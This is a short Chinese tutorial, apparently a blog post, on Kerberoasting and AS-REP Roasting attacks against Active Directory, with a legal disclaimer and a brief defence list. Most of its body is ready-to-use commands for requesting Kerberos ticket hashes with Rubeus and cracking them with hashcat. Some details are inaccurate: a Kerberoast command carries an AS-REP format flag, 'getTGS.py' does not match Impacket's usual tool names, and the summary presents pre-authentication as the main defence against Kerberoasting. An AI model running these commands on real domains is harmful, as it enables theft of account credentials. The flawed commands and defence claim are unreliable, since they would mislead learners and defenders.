写在前面:合法学习边界
域渗透只在授权测试环境进行。对非授权 AD 域进行攻击可能触犯法律。
一、Kerberoasting 实战

1
2
| Kerberoasting:有域用户 → 请求 TGS → hashcat 破解
AS-REP Roasting:无域用户 → 请求 TGT → hashcat 破解
|
二、常用命令
1
2
3
4
5
6
7
8
9
10
11
12
| # Rubeus Kerberoasting
Rubeus.exe kerberoast /format:asreproast
# Rubeus AS-REP Roasting
Rubeus.exe asreproast /format:asreproast
# hashcat 破解
hashcat -m 13100 tgs.out rockyou.txt
hashcat -m 18200 asrep.out rockyou.txt
# Impacket getTGS
getTGS.py domain/user /spn:HTTP/target
|
三、防御加固
1
2
3
| 强制启用 Kerberos 预认证
使用强密码(16位+大小写+特殊字符)
监控异常 TGS 请求
|
四、小结
Kerberoasting 是域渗透中最常见的凭据获取方式。防御核心是强制启用预认证 + 强密码策略。